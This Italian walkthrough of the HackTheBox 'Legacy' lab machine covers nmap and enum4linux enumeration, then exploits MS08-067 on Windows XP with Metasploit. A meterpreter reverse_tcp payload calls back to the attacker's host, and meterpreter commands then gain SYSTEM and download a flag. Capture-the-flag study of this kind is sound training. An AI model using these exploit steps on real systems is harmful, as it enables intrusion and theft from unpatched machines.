Walkthrough HTB – Machine Legacy

Obiettivo: Ottenere accesso come utente e successivamente come amministratore sulla macchina Legacy di HackTheBox.


1. Reconnaissance

nmap -sC -sV -oN nmap/legacy.txt 10.10.10.4

Risultato nmap:


2. Enumerazione SMB

Utilizziamo enum4linux per raccogliere informazioni:

enum4linux -a 10.10.10.4

Identifichiamo che la macchina esegue Windows XP e ha condivisioni SMB accessibili.


3. Exploitazione con Metasploit

Carichiamo Metasploit e cerchiamo un exploit adatto:

msfconsole
use exploit/windows/smb/ms08_067_netapi
set RHOST 10.10.10.4
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <tuo_IP>
exploit

Nota: L’exploit ms08_067_netapi è noto per compromettere sistemi Windows XP non patchati.


4. Accesso alla Shell

Una volta eseguito l’exploit con successo, otteniamo una sessione Meterpreter:

meterpreter > sysinfo
Computer        : LEGACY
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86

5. Escalation dei Privilegi

Verifichiamo i privilegi attuali:

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Siamo già connessi come SYSTEM, quindi abbiamo i massimi privilegi.


6. Raccolta delle Bandiere

Navighiamo nelle directory degli utenti per trovare le bandiere:

meterpreter > cd C:\Documents and Settings\Administrator\Desktop
meterpreter > ls
flag.txt

Scarichiamo il file:

meterpreter > download flag.txt

Conclusione

La macchina Legacy sfrutta una vulnerabilità critica in SMB su sistemi Windows XP. L’utilizzo di Metasploit semplifica notevolmente l’exploitazione. È fondamentale comprendere le implicazioni di sicurezza legate a sistemi obsoleti e non aggiornati.


Riferimenti